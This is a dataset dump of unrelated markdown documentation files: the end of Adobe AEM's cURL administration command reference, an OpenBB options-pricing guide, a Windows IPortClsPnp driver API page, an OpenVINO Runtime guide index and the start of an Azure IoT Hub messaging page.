curl -u admin:admin -FcreateUser= -FauthorizableId=hashim -Frep:password=hashim http://localhost:4502/libs/granite/security/post/authorizables
```
#### Create a New Group {#create-a-new-group}
```shell
curl -u admin:admin -FcreateGroup=group1 -FauthorizableId=testGroup1 http://localhost:4502/libs/granite/security/post/authorizables
```
#### Add a Property to an Existing User {#add-a-property-to-an-existing-user}
```shell
curl -u admin:admin -Fprofile/age=25 http://localhost:4502/home/users/h/hashim.rw.html
```
#### Create a User with a Profile {#create-a-user-with-a-profile}
```shell
curl -u admin:admin -FcreateUser=testuser -FauthorizableId=hashimkhan -Frep:password=hashimkhan -Fprofile/gender=male http://localhost:4502/libs/granite/security/post/authorizables
```
#### Create a New User as a Member of a Group {#create-a-new-user-as-a-member-of-a-group}
```shell
curl -u admin:admin -FcreateUser=testuser -FauthorizableId=testuser -Frep:password=abc123 -Fmembership=contributor http://localhost:4502/libs/granite/security/post/authorizables
```
#### Add a User to a Group {#add-a-user-to-a-group}
```shell
curl -u admin:admin -FaddMembers=testuser1 http://localhost:4502/home/groups/t/testGroup.rw.html
```
#### Remove a User from a Group {#remove-a-user-from-a-group}
```shell
curl -u admin:admin -FremoveMembers=testuser1 http://localhost:4502/home/groups/t/testGroup.rw.html
```
#### Set a User's Group Membership {#set-a-user-s-group-membership}
```shell
curl -u admin:admin -Fmembership=contributor -Fmembership=testgroup http://localhost:4502/home/users/t/testuser.rw.html
```
#### Delete a User {#delete-a-user}
```shell
curl -u admin:admin -FdeleteAuthorizable= http://localhost:4502/home/users/t/testuser
```
#### Delete a Group {#delete-a-group}
```shell
curl -u admin:admin -FdeleteAuthorizable= http://localhost:4502/home/groups/t/testGroup
```
### Backup {#backup}
See [Backup and Restore](/help/sites-administering/backup-and-restore.md#automating-aem-online-backup) for details.
### OSGi {#osgi}
#### Starting a Bundle {#starting-a-bundle}
```shell
curl -u admin:admin -Faction=start http://localhost:4502/system/console/bundles/<bundle-name>
```
#### Stopping a Bundle {#stopping-a-bundle}
```shell
curl -u admin:admin -Faction=stop http://localhost:4502/system/console/bundles/<bundle-name>
```
### Dispatcher {#dispatcher}
#### Invalidate the Cache {#invalidate-the-cache}
```shell
curl -H "CQ-Action: Activate" -H "CQ-Handle: /content/test-site/" -H "CQ-Path: /content/test-site/" -H "Content-Length: 0" -H "Content-Type: application/octet-stream" http://localhost:4502/dispatcher/invalidate.cache
```
#### Evict the Cache {#evict-the-cache}
```shell
curl -H "CQ-Action: Deactivate" -H "CQ-Handle: /content/test-site/" -H "CQ-Path: /content/test-site/" -H "Content-Length: 0" -H "Content-Type: application/octet-stream" http://localhost:4502/dispatcher/invalidate.cache
```
### Replication Agent {#replication-agent}
#### Check the Status of an Agent {#check-the-status-of-an-agent}
```shell
curl -u admin:admin "http://localhost:4502/etc/replication/agents.author/publish/jcr:conten t.queue.json?agent=publish"
http://localhost:4502/etc/replication/agents.author/publish/jcr:content.queue.js on?agent=publish
```
#### Delete an Agent {#delete-an-agent}
```shell
curl -X DELETE http://localhost:4502/etc/replication/agents.author/replication99 -u admin:admin
```
#### Create an Agent {#create-an-agent}
```shell
curl -u admin:admin -F "jcr:primaryType=cq:Page" -F "jcr:content/jcr:title=new-replication" -F "jcr:content/sling:resourceType=/libs/cq/replication/components/agent" -F "jcr:content/template=/libs/cq/replication/templates/agent" -F "jcr:content/transportUri=http://localhost:4503/bin/receive?sling:authRequestLogin=1" -F "jcr:content/transportUser=admin" -F "jcr:content/transportPassword={DES}8aadb625ced91ac483390ebc10640cdf"http://localhost:4502/etc/replication/agents.author/replication99
```
#### Pause an Agent {#pause-an-agent}
```shell
curl -u admin:admin -F "cmd=pause" -F "name=publish" http://localhost:4502/etc/replication/agents.author/publish/jcr:content.queue.js on
```
#### Clear an Agent Queue {#clear-an-agent-queue}
```shell
curl -u admin:admin -F "cmd=clear" -F "name=publish" http://localhost:4502/etc/replication/agents.author/publish/jcr:content.queue.js on
```
### Communities {#communities}
#### Assign and Revoke Badges {#assign-and-revoke-badges}
See [Communities Scoring and Badges](/help/communities/implementing-scoring.md#assign-and-revoke-badges) for details.
See [Scoring and Badges Essentials](/help/communities/configure-scoring.md#example-setup) for details.
#### MSRP Reindexing {#msrp-reindexing}
See [MSRP - MongoDB Storage Resource Provider](/help/communities/msrp.md#running-msrp-reindex-tool-using-curl-command) for details.
### Security {#security}
#### Enabling and Disabling CRX DE Lite {#enabling-and-disabling-crx-de-lite}
See [Enabling CRXDE Lite in AEM](/help/sites-administering/enabling-crxde-lite.md) for details.
### Data Store Garbage Collection {#data-store-garbage-collection}
See [Data Store Garbage Collection](/help/sites-administering/data-store-garbage-collection.md#automating-data-store-garbage-collection) for details.
### Analytics and Target Integration {#analytics-and-target-integration}
See [Opting Into Adobe Analytics and Adobe Target](/help/sites-administering/opt-in.md#configuring-the-setup-and-provisioning-via-script) for details.
### Single Sign On {#single-sign-on}
#### Send Test Header {#send-test-header}
See [Single Sign On](/help/sites-deploying/single-sign-on.md) for details.
## Common Content Manipulation AEM cURL Commands {#common-content-manipulation-aem-curl-commands}
Here is a list of AEM cURL commands for content manipulation.
>[!NOTE]
>
>The following examples assume that AEM is running on `localhost` on port `4502` and uses the user `admin` with password `admin`. Additional command placeholders are set in angle brackets.
### Page Management {#page-management}
#### Page Activation {#page-activation}
```shell
curl -u admin:admin -X POST -F path="/content/path/to/page" -F cmd="activate" http://localhost:4502/bin/replicate.json
```
#### Page Deactivation {#page-deactivation}
```shell
curl -u admin:admin -X POST -F path="/content/path/to/page" -F cmd="deactivate" http://localhost:4502/bin/replicate.json
```
#### Tree Activation {#tree-activation}
```shell
curl -u admin:admin -F cmd=activate -F ignoredeactivated=true -F onlymodified=true -F path=/content/geometrixx http://localhost:4502/etc/replication/treeactivation.html
```
#### Lock Page {#lock-page}
```shell
curl -u admin:admin -X POST -F cmd="lockPage" -F path="/content/path/to/page" -F "_charset_"="utf-8" http://localhost:4502/bin/wcmcommand
```
#### Unlock Page {#unlock-page}
```shell
curl -u admin:admin -X POST -F cmd="unlockPage" -F path="/content/path/to/page" -F "_charset_"="utf-8" http://localhost:4502/bin/wcmcommand
```
#### Copy Page {#copy-page}
```shell
curl -u admin:admin -F cmd=copyPage -F destParentPath=/path/to/destination/parent -F srcPath=/path/to/source/location http://localhost:4502/bin/wcmcommand
```
### Workflows {#workflows}
See [Interacting with Workflows Programmatically](/help/sites-developing/workflows-program-interaction.md) for details.
### Sling Content {#sling-content}
#### Create a Folder {#create-a-folder}
```shell
curl -u admin:admin -F jcr:primaryType=sling:Folder http://localhost:4502/etc/test
```
#### Delete a Node {#delete-a-node}
```shell
curl -u admin:admin -F :operation=delete http://localhost:4502/etc/test/test.properties
```
#### Move a Node {#move-a-node}
```shell
curl -u admin:admin -F":operation=move" -F":applyTo=/sourceurl" -F":dest=/target/parenturl/" https://lcoalhost:4502/content
```
#### Copy a Node {#copy-a-node}
```shell
curl -u admin:admin -F":operation=copy" -F":applyTo=/sourceurl" -F":dest=/target/parenturl/" https://lcoalhost:4502/content
```
#### Upload Files Using Sling PostServlet {#upload-files-using-sling-postservlet}
```shell
curl -u admin:admin -F"*=@test.properties" http://localhost:4502/etc/test
```
#### Upload Files Using Sling PostServlet and Specifying Node Name {#upload-files-using-sling-postservlet-and-specifying-node-name}
```shell
curl -u admin:admin -F"test2.properties=@test.properties" http://localhost:4502/etc/test
```
#### Upload Files Specifying a Content Type {#upload-files-specifying-a-content-type}
```shell
curl -u admin:admin -F "*=@test.properties;type=text/plain" http://localhost:4502/etc/test
```
### Asset Manipulation {#asset-manipulation}
See [Assets HTTP API](/help/assets/mac-api-assets.md) for details.
| 37.8925 | 632 | 0.74454 | eng_Latn | 0.587796 |
fa5b028c5117f82b7c75d63ca6ad3c4179291a7e | 2,543 | md | Markdown | website/content/terminal/stocks/options/pricing/_index.md | JerBouma/OpenBBTerminal | 0c60d70cb29b0a6e4db41d6dd0d34f79a6169b27 | [
"MIT"
] | null | null | null | website/content/terminal/stocks/options/pricing/_index.md | JerBouma/OpenBBTerminal | 0c60d70cb29b0a6e4db41d6dd0d34f79a6169b27 | [
"MIT"
] | null | null | null | website/content/terminal/stocks/options/pricing/_index.md | JerBouma/OpenBBTerminal | 0c60d70cb29b0a6e4db41d6dd0d34f79a6169b27 | [
"MIT"
] | null | null | null | ---
title: Introduction to the Options Pricing Submenu
keywords: "Options, stocks, derivatives, puts, calls, oi, vol, greeks, hedge, gamme, delta, theta, rho, vanna, vomma, phi, charm, iv, volatility, implied, realized, price, last, bid, ask, expiry, expiration, chains, chain, put, call"
date: "2022-06-08"
type: guides
status: publish
excerpt: "This guide introduces the user to the Options Pricing submenu, within the Options menu."
geekdocCollapseSection: true
---
This set of features is for composing hypothetical outcomes through user-defined inputs. There are two columns of inputs:
- price - the price for the underlying at the close on expiration.
- probability - the statistical probability of the outcome, where 1 = 100% & probability always = 1.
The Pricing submenu is accessible after selecting an <a href="https://openbb-finance.github.io/OpenBBTerminal/terminal/stocks/options/exp/" target="_blank">expiration date</a> for the options chain. Type, `pricing`, and press enter for access.

<h2>How to use the Pricing Submenu</h2>
Use the `add` command to build the list, and use the `rmv` command to take away any entries.

`show` will print a table of the inputs. Multiple price points can be added, assuming that probability always sums at 100%.

<h2>Examples</h2>
Adding the optional argument, `-p`, will calculate the puts in the chain.

Removing the risk-free rate variable makes a substantial difference to the calculated value of an option. With monetary policy on the move, this is an important variable to consider as financial conditions change.

RFR as 0 for call options

Back to <a href="https://openbb-finance.github.io/OpenBBTerminal/terminal/stocks/options/" target="_blank">Introduction to the Options Menu</a>
| 57.795455 | 243 | 0.782147 | eng_Latn | 0.814695 |
fa5b7437280e9604c40c55718c29c2021c9f9ab5 | 1,870 | md | Markdown | wdk-ddi-src/content/portcls/nn-portcls-iportclspnp.md | ajkhoury/windows-driver-docs-ddi | 38e0703cb4fa811e9f7690c9518f0b5f0af15464 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | wdk-ddi-src/content/portcls/nn-portcls-iportclspnp.md | ajkhoury/windows-driver-docs-ddi | 38e0703cb4fa811e9f7690c9518f0b5f0af15464 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | wdk-ddi-src/content/portcls/nn-portcls-iportclspnp.md | ajkhoury/windows-driver-docs-ddi | 38e0703cb4fa811e9f7690c9518f0b5f0af15464 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
UID: NN:portcls.IPortClsPnp
title: IPortClsPnp (portcls.h)
description: IPortClsPnp is the PnP management interface that the port class driver (PortCls) exposes to the adapter.
old-location: audio\iportclspnp.htm
tech.root: audio
ms.assetid: AC04051E-8412-4B61-B452-C05A9D8D5CD9
ms.date: 05/08/2018
keywords: ["IPortClsPnp interface"]
ms.keywords: IPortClsPnp, IPortClsPnp interface [Audio Devices], IPortClsPnp interface [Audio Devices],described, audio.iportclspnp, portcls/IPortClsPnp
f1_keywords:
- "portcls/IPortClsPnp"
req.header: portcls.h
req.include-header:
req.target-type: Windows
req.target-min-winverclnt:
req.target-min-winversvr:
req.kmdf-ver:
req.umdf-ver:
req.ddi-compliance:
req.unicode-ansi:
req.idl:
req.max-support:
req.namespace:
req.assembly:
req.type-library:
req.lib:
req.dll:
req.irql:
topic_type:
- APIRef
- kbSyntax
api_type:
- COM
api_location:
- portcls.h
api_name:
- IPortClsPnp
product:
- Windows
targetos: Windows
req.typenames:
---
# IPortClsPnp interface
## -description
<code>IPortClsPnp</code> is the PnP management interface that the port class driver (PortCls) exposes to the adapter.
For more information, see <a href="https://docs.microsoft.com/windows-hardware/drivers/audio/implement-pnp-rebalance-for-portcls-audio-drivers">Implement PnP Rebalance for PortCls Audio Drivers</a>.
The <code>IPortClsPnp</code> interface is available in Windows 10, version 1511 and later versions of Windows.
## -inheritance
The <b xmlns:loc="http://microsoft.com/wdcml/l10n">IPortClsPnp</b> interface inherits from the <a href="https://docs.microsoft.com/windows/win32/api/unknwn/nn-unknwn-iunknown">IUnknown</a> interface. <b>IPortClsPnp</b> also has these types of members:
<ul>
<li><a href="https://docs.microsoft.com/">Methods</a></li>
</ul>
| 28.769231 | 252 | 0.740107 | eng_Latn | 0.372884 |
fa5ba874ec2edb459557714dc6729dfb183470d7 | 4,061 | md | Markdown | _posts/2019-09-30-TIL_190930_1006.md | armkernel/armkernel.github.io | f74b8ddfc8a69dec8b5eeccb4d92c62dcc6c321a | [
"MIT"
] | 2 | 2019-08-06T13:45:02.000Z | 2019-11-06T01:15:30.000Z | _posts/2019-09-30-TIL_190930_1006.md | armkernel/armkernel.github.io | f74b8ddfc8a69dec8b5eeccb4d92c62dcc6c321a | [
"MIT"
] | null | null | null | _posts/2019-09-30-TIL_190930_1006.md | armkernel/armkernel.github.io | f74b8ddfc8a69dec8b5eeccb4d92c62dcc6c321a | [
"MIT"
] | null | null | null | ---
layout : post
title : "[TIL] 190930 ~ 191006"
tags : [ "TIL (Today I Learn)" ]
comments: true
---
## 10월 1일 (화)
### 오늘 한 일
- 독서 모임 관리 시스템 개발
- 각종 클래스 정의
- person -> reader 상속
- book (name, date, picture)
- system
### 백지 노트
- 디자인 관점없이 개발을 하게 된다면, 제대로 된 개발을 할 수 없다는 것을 알게되었다. 특히, DAO부분이 가장 문제가 됐다.
---
## 10월 2일 (수)
### 오늘 한 일
- Git
- hash와 commit id는 다른 것
- fetch
- regression test
- Yocto
### 백지 노트
- git hash를 보기 위한 명령어
- git show-ref
- git fetch
- HEAD 까지 update된 commit들을 가져오는 것. but merge는 하지 않는다.
- fetch + merge => git pull
- regression test
- 우리가 변경한 내용에 대해 문제가 발생했을 경우 문제를 찾기 위해 돌아가는 테스트
- Yocto
- fetch
- configure
- unpack
- compile
- package
- 위 순서와 같이 필요한 순서대로 해당하는 do로 prefix된 함수들을 호출함.
- bitbake -c : -c 같은 경우 소문자로 전달하는 동작만 수행한다. 예를들어 -c compile만 적어준다면, compile이후 동작과 무관하게 컴파일 동작만 수행한다.
- bitbake -C : -C 같은 경우 대문자로 전달한 동작을 포함해 이후 동작까지 진행한다.
- opkg 같은 경우 package를 관리하는 도구. ipk등을 풀거나 묶을 때 주로 사용.
- chromium은 cbe라고 정의된 라이브러리만 바꿔사용하면 됨.
- module 빌드 같은 경우 module만 컴파일 한 후 필요한 library를 바꿔주면 됨.
---
## 10월 3일 (목)
### 오늘 한 일
- DAO 구현
- Read file
- Write file
- Search
### 백지 노트
- DAO 같은 경우 Data Access Object이다. 우선 디자인 패턴을 고려하기 보다는 빠르게 구현할 수 있는 방식으로 만들어보자. 오늘 알게 된 사실은 하나의 DAO 에서는 오직 하나의 File만 관리해야한다. 예를 들면, 데이터베이스에 접근을 하더라도 하나의 테이블을 담당해서 접근하는 객체라고 생각하면 된다. 이렇게 할 경우 좋은 점은 어떤 데이터가 들어올지에 대해 걱정할 필요가 없어 읽어드리는 데이터는 항상 고정되어있다는 점이다.
- 하나의 DAO에서 다수의 파일을 접근해 데이터를 읽어올 경우 어떤 데이터가 들어오는지 알 수 없기때문에 문제가 된다. 어떤 객체가 어떤 타입으로 DAO를 알지 못한다면, 파일에서 읽어오는 데이터도 고정되지 않는다는 뜻이다. 중요한점, <mark> DAO 는 하나의 file만 관리<mark>
- 개발 계획
- DAO 설계 및 구현
- 어떤 방식으로 엮을지 고민
---
## 10월 4일 (금)
### 오늘 한 일
- Template 공부
- Template parameter
- Using 사용
- Specialization
### 백지노트
- Template parmeter 로 전달받을 수 있는 요소
- 정수형 기본 선언 가능 (int, short long etc.)
- template<typename T, int>
- enum 상수 타입
- enum color {red = 1, green = 2};
- template<color>
- 포인터 타입
- template<int *>
- 함수의 포인터 타입
- template<int(*)(int)>
- 멤버함수 포인터
- C++17 이후 auto type으로 전달 받을 수 있음
- Using을 사용하면 좋은 점 -> template을 별명화 시킬 수 있다.
- typedef 같은 경우 type만 가지고 놀 수 있음. Template은 type이 아님. template element <type> 를 해야 type이 된다. 따라서, template에 이름을 붙이기 위해서 using이라는 키워드를 사용해야함. c++11 부터 제공
- using을 이용하면, 템플릿의 인자를 적절하게 변경할 수 있다.
- Specification은 특정 인자만 따로 전달받아서 사용할 수 있도록 템플릿을 구체화 하는 작업
- 좀 더 narrow하게 접근해 가까운 template을 호출하도록 함.
- template<typename T> class test <mark>\< \> <mark> test라는 이름 뒤에 괄호 연산자를 연 후 무슨 타입으로 전달받을 것인지를 구체화해서 적는 작업
- 소스코드를 통해 연습 필요.
- 모두 다 호출가능하도록 만드는 템플릿을 primary template이라 칭함.
1. primary template 의 template 인자 개수가 2개라면, 사용자는 반드시 2개의 인자를 전달해야한다. (default가 없는 경우)
2. partial specialization을 할 경우 template의 인자 개수와 상관 없이 specialization 하는 부분의 인자 개수만 primary template의 인자 개수와 동일하게 맞춰 주면 됨. (이게 템플릿에 의한 partial specializaion이라는 것을 알아야함.)
3. 재귀적 모양이 중요하다.
```c
template <typename T, typename U, typename V>
class Test <T, Test<U,V>> // 재귀적 형태
```
---
## 10월 6일 (일)
### 오늘 한 일
- Template 공부
- Specialization
- Specialization 주의 사항
- [TE](armkernel.github.io/TE_191006/) 한 문장을 외웠다.
- I jog in the park every morning. After jogging, I get very thirsty, but i don't drink from water fountains. I worry about getting sick from the water. So I just wait until i get home.
### 백지 노트
- code practice 위치
- ../code_practice/10/1006/\*.cpp
- specialization은 템플릿의 클래스 만드는 틀이라는 개념을 이용해서 특수 목적 클래스를 만들 떄 사용하는 기법이다. 컴파일 시간에 전달되는 인자를 이용해서 클래스를 생성하게 되는데, 이때 특정 타입에 대해 다른(특정) 클래스를 만들도록 하는데 사용하는 기법. 얼마나 구체적으로 정의하느냐에 따라, partial specialization 또는 specialization으로 정의한다. 두 개의 차이는 typename을 이용해 범용적으로 데이터를 받느냐 아니면, 사용자가 정의한 것만 받느냐에 따라 달라진다. (e.g. T\*, char\*)
- specialization 일 경우 typename을 적지말아야한다.
- specialization 주의사항
- 부분 특수화를 하게 되면 전달 되는 타입이 달라질 수가 있다. -> (e.g. int\* -> int)
- partial specialization에서는 default 값을 변경할 수 없다. 즉, primary template에서만 default 값을 정할 수 있다.
- code size는 커질 수 있지만, object file size는 커지지 않는다. 왜냐하면, template이 틀이기 떄문에, 실제 모든 코드가 사용되는 것은 아니다. 하지만, 내부에서 sepcialization을 많이 사용하도록 구현 되어져 있다면, obj 파일 사이즈가 약간 커질 수도 있다.
| 29.007143 | 309 | 0.66166 | kor_Hang | 1.00001 |
fa5bd744a3c5644ae9603018719889a76d5b7722 | 5,327 | md | Markdown | 2prototype/standard-sdk-manager/projects/analytics-browser/README.md | redredredredredred/hands-on | c983c20f02298d5c3292474126ff563cc8df5c89 | [
"MIT"
] | null | null | null | 2prototype/standard-sdk-manager/projects/analytics-browser/README.md | redredredredredred/hands-on | c983c20f02298d5c3292474126ff563cc8df5c89 | [
"MIT"
] | 1 | 2021-07-20T11:54:58.000Z | 2021-07-20T11:56:15.000Z | 2prototype/standard-sdk-manager/projects/analytics-browser/README.md | redredredredredred/hands-on | c983c20f02298d5c3292474126ff563cc8df5c89 | [
"MIT"
] | null | null | null | ## 使用说明
将代码放在 head 或者其他 js 脚本之前添加
```
(function(n,e,t,a,i){var o="pageStartTime";var r="HuamiBrowserAnalytics";n[o]=Date.now();n[r]={config:{},queue:[]};n[i]={init:function(e){n[r].config=e},push:function(e){n[r].queue.push(e)}};if("PerformanceLongTaskTiming"in window){var c=window.__tti={e:[]};c.o=new PerformanceObserver(function(e){c.e=c.e.concat(e.getEntries())});c.o.observe({entryTypes:["longtask"]})}var s=e.createElement(t);s.onload=s.onreadystatechange=function(){var e=s.readyState;if(typeof e==="undefined"||e==="loaded"||e==="complete"){try{window[i]=window["Analytics"];if(window[i])window[i].ready()}finally{s.onload=s.onreadystatechange=null}}s.onreadystatechange=null};s.async=true;s.setAttribute("type","text/javascript");s.setAttribute("src",a);document.head.appendChild(s)})(typeof window!=="undefined"?window:this,document,"script","https://fe-cdn.huami.com/analytics-browser/1.2.7/analytics.min.js",
"HM_Analytics");
```
最新 SDK 地址是 https://fe-cdn.huami.com/analytics-browser/1.2.9/analytics.min.js
我们将会进行几步操作
1. 创建一个 script 标签,引入我们的 SDK
2. 初始化一个全局变量 HM_Analytics, 如果你想换成其他名称,可以把引入代码段的最后一个单词'HM_Analytics'替换成你想要的变量名
3. 加载完成
## 初始化
加载完统计 Javascript SDK 后, 你需要进行初始化设置,方法如下:
```
HM_Analytics.init(config)
```
#### 具体配置字段
| 字段 | 必选/可选 | 类型 | 含义 | 可选值 |
| :-: | :-: | :-: | :-: | :-: |
| debug | 必选 | Boolean | 是否测试环境 | true/false,建议根据 process.env 来判断 |
| clients | 必选 | Object | 具体的统计平台和对应的 id | 华米打点使用 appid,百度使用 siteId |
| namespace | 必选 | String | 华米打点文档里约定的 namespace |
| usid | 可选 | String | 用户 id | 可以通过 jsbridge 拿到,如果没有,由后台生成 |
| isSPA | 可选 | Boolean | 是否单页面应用 | true/false |
| autoPushPV | 可选 | Boolean | 是否自动统计 PV | 单页面应用自动统计 PV(isSPA=true) |
| autoOPT | 可选 | Boolean | 是否自动统计页面停留时间 | true/false |
---
- 使用示例
```
HM_Analytics.init({
debug: ENV !== 'pro',
clients: {
huami: '华米ID,由大数据团队提供',
baidu: '百度统计的SiteId'
},
namespace: 'Discover_Choice',
isSPA: false,
autoPushPV: false,
})
```
为保证数据准确性,建议使用手动打点记录当前首屏时间。
## 方法
##### PV 统计
固定使用常量字段\_trackPageview 标识 PV 统计
```
HM_Analytics.push(['_trackPageview'])
```
##### 事件统计
```
HM_Analytics.push(['_trackEvent', category, action, opt_label, options])
```
---
| 名称 | 必选/可选 | 类型 | 功能 |
| :-------: | :-------: | :----: | :---------------------------------------: |
| category | 必选 | String | 要监控的目标的类型名称,对应华米参数的 tp |
| action | 必选 | String | 用户跟网页进行交互的动作名称 |
| opt_label | 必选 | String | 事件的一些额外信息,对应的华米参数的 n |
| options | 必选 | Object | 扩展参数 |
---
- category:要监控的目标的类型名称,对应华米打点参数的 tp。
- action:用户跟目标交互的行为,如"点击"、"曝光"。
- opt_label:事件的一些额外信息,也可以使用华米打点参数里的 n。
- options: 华米打点文档要传入的扩展参数,对应华米的 ep,比如记录页面素材 id 第等。
- opt_value:options 的参数之一,百度打点统计需要,代表事件的一些数值信息,比如权重、时长、价格等等。
示例
```
HM_Analytics.push(['_trackEvent','hservice_banner', '曝光', '素材标题', {
opt_value: 1,
id: '素材ID',
pos: '素材位置0-M'
}])
```
##### 曝光事件统计
```
<div class="hmrp-expose" data-$hmex="{'id':'素材5','pos':'素材位置Bottom','tp':'免责声明','n':'曝光区块'}">你看到我了</div>
```
- 添加 class 名为 hmrp-expose
- 添加 data-\$hmex,自定义上报数据,格式为{'id':'素材 5','pos':'素材位置 Bottom','tp':'免责声明','n':'曝光区块'}
- tp 为 打点内容 , n 为曝光类型说明,id 为元素 id,pos 描述页面位置
##### 首屏时间统计
```
HM_Analytics.push(['_trackFMP'])
```
示例
```
HM_Analytics.push(['_trackFMP'])
```
## 性能指标 FAQ
- #### 指标列表
| 名称 | 指标 | 类型 | 解释 |
| :------------: | :--------------: | :----: | :--------------------------------: |
| 白屏时间 | FirstPaintTime | Number | 浏览器出现第一个元素的时间 |
| 首屏时间 | FMP | Number | 首屏加载完成的时间 |
| 页面可交互时间 | InteractiveTime | Number | 用户可以与浏览器进行交互操作的时间 |
| 停留时间 | OnPageTime | Number | 用户在网页上停留的时间 |
| DNS 查询时间 | LookupDomainTime | Number |
| TCP 连接时间 | ConnectTime | Number |
| 资源加载时间 | NetworkTime | Number |
| DomReady 时间 | DomReadyTime | Number |
***
- #### 白屏时间
白屏时间 = 地址栏输入网址后回车 - 浏览器出现第一个元素
```
DOM Ready时间 - timing.navigationStart
```
- #### 首屏时间的统计 (First Meaning Paint)
首屏时间 = 地址栏输入网址后回车 - 浏览器第一屏渲染完成
##### 传统页面
传统页面大部分是传统服务器端渲染, 这个时候我们认为图片是最后完成加载的,所以我们只需要统计图片加载完成的时间,最终的页面加载时间就是 DOM Ready 时间 + 传输图片时间。
##### SPA(single-page application)
对于单页面应用,我们可以使用埋点 + 监听图片时间来获得,但是这样侵入性会比较强。 还有一中做法是,业务中我们都是 ajax 请求获取数据,然后拼接 html。所以可以拦截首个 ajax,以他们的返回时间来得到一个时间 T1,然后使用 MutationObserver 来不断监听 DOM 变化,直到最后稳定,来获得一个时间。为了避免页面间隔时间变长,我们设置个统计超时时间,比如 8 秒。在页面不断变化中,我们统计一个加载趋势。
- #### 页面可交互时间
- #### 页面停留时间的统计(Time on Page)
- ##### 业界通常做法
- Google/Baidu 记录 A 页面的访问时间,假如跳转到 B,那么就用 B 的访问时间减去 A 的访问时间
- 心跳
- 事件监听
- ##### 传统页面
- 常规页面加载、刷新、关闭可以通过 window.onbeforeunload 来监听页面离开
- 需要注意处理的地方是用户的其他操作,比如最小化浏览器、切换 tab、切换窗口、前进后退.
- HTML5 visibilitychange, 只支持 IE10 +
- 不支持 Page Visibility API 的页面使用 focus/blur,但是会造成不准确的统计(需要用户点击触发 focus)
- 浏览器的后退, 使用 pageshow 监听
- ##### SPA(single-page application)
- 使用 HTML5 history api 监听单页面应用的变化,对 pushstate 和 replacestate 进行 hack
- 旧版本浏览器使用 hashchange
- ##### 统计数据的传输
- 统计的成功率 onunload 事件中发送网络请求,事件结束后页面资源会被释放掉,这个时候我们的数据无法保证发送成功。所以我们通常要使用同步的 XMLHttpRequest,或者使用 navigator.sendBeacon 来发送。
- 设置最大数值 用户有可能一直停留在当前页面,这个时候我们拿到的停留时间可能是个超级大整数,所以我们设置了一个上限,比如 3 天
| 30.97093 | 883 | 0.614042 | yue_Hant | 0.765679 |
fa5c91417ff08ce1b96b64d6cdcdb03242c55df9 | 2,086 | md | Markdown | docs/OV_Runtime_UG/openvino_intro.md | SachinDabhade/openvino | 857a1ad2af32a995e8a58a09c2c9383d174c4542 | [
"Apache-2.0"
] | 1 | 2022-03-25T10:35:59.000Z | 2022-03-25T10:35:59.000Z | docs/OV_Runtime_UG/openvino_intro.md | SachinDabhade/openvino | 857a1ad2af32a995e8a58a09c2c9383d174c4542 | [
"Apache-2.0"
] | null | null | null | docs/OV_Runtime_UG/openvino_intro.md | SachinDabhade/openvino | 857a1ad2af32a995e8a58a09c2c9383d174c4542 | [
"Apache-2.0"
] | null | null | null | # OpenVINO™ Runtime User Guide {#openvino_docs_OV_Runtime_User_Guide}
@sphinxdirective
.. _deep learning inference engine:
.. toctree::
:maxdepth: 1
:hidden:
openvino_docs_Integrate_OV_with_your_application
<!-- should be a part of Integrate OV in user application -->
openvino_docs_IE_DG_ShapeInference
openvino_docs_OV_UG_Working_with_devices
openvino_docs_OV_Runtime_UG_Preprocessing_Overview
openvino_docs_OV_UG_DynamicShapes
openvino_docs_IE_DG_supported_plugins_AUTO
openvino_docs_OV_UG_Running_on_multiple_devices
openvino_docs_OV_UG_Hetero_execution
openvino_docs_OV_UG_Automatic_Batching
openvino_docs_IE_DG_network_state_intro
openvino_docs_OV_Runtime_UG_Python_API_exclusives
openvino_2_0_transition_guide
openvino_docs_OV_Should_be_in_performance
@endsphinxdirective
## Introduction
OpenVINO Runtime is a set of C++ libraries with C and Python bindings providing a common API to deliver inference solutions on the platform of your choice. Use the OpenVINO Runtime API to read an Intermediate Representation (IR), ONNX, or PaddlePaddle model and execute it on preferred devices.
OpenVINO Runtime uses a plugin architecture. Its plugins are software components that contain complete implementation for inference on a particular Intel® hardware device: CPU, GPU, VPU, etc. Each plugin implements the unified API and provides additional hardware-specific APIs, for configuring devices, or API interoperability between OpenVINO Runtime and underlying plugin backend.
The scheme below illustrates the typical workflow for deploying a trained deep learning model:
<!-- TODO: need to update the picture below with PDPD files -->

## Video
@sphinxdirective
.. list-table::
* - .. raw:: html
<iframe allowfullscreen mozallowfullscreen msallowfullscreen oallowfullscreen webkitallowfullscreen height="315" width="100%"
src="https://www.youtube.com/embed/e6R13V8nbak">
</iframe>
* - **Inference Engine Concept**. Duration: 3:43
@endsphinxdirective
| 39.358491 | 383 | 0.800096 | eng_Latn | 0.862563 |
fa5dbc1b395fd7e4052030b75527c80d1df510d2 | 3,795 | md | Markdown | articles/iot-hub/iot-hub-devguide-messaging.md | Artaggedon/azure-docs.es-es | 73e6ff211a5d55a2b8293a4dc137c48a63ed1369 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/iot-hub/iot-hub-devguide-messaging.md | Artaggedon/azure-docs.es-es | 73e6ff211a5d55a2b8293a4dc137c48a63ed1369 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/iot-hub/iot-hub-devguide-messaging.md | Artaggedon/azure-docs.es-es | 73e6ff211a5d55a2b8293a4dc137c48a63ed1369 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Información sobre la mensajería de IoT Hub de Azure | Microsoft Docs
description: 'Guía del desarrollador: mensajería de dispositivo a nube y de nube a dispositivo con IoT Hub Incluye información sobre los formatos de mensaje y protocolos de comunicación compatibles.'
author: wesmc7777
manager: philmea
ms.author: wesmc
ms.service: iot-hub
services: iot-hub
ms.topic: conceptual
ms.date: 01/29/2018
ms.custom:
- 'Role: Cloud Development'
ms.openlocfilehash: e25b9d6cbe8446fb2f10150f17f7e2b0ccf85d3c
ms.sourcegitcommit: f28ebb95ae9aaaff3f87d8388a09b41e0b3445b5
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 03/29/2021
ms.locfileid: "92147630"
---
# <a name="send-device-to-cloud-and-cloud-to-device-messages-with-iot-hub"></a>Envío de mensajes de dispositivo a nube y de nube a dispositivo con IoT Hub
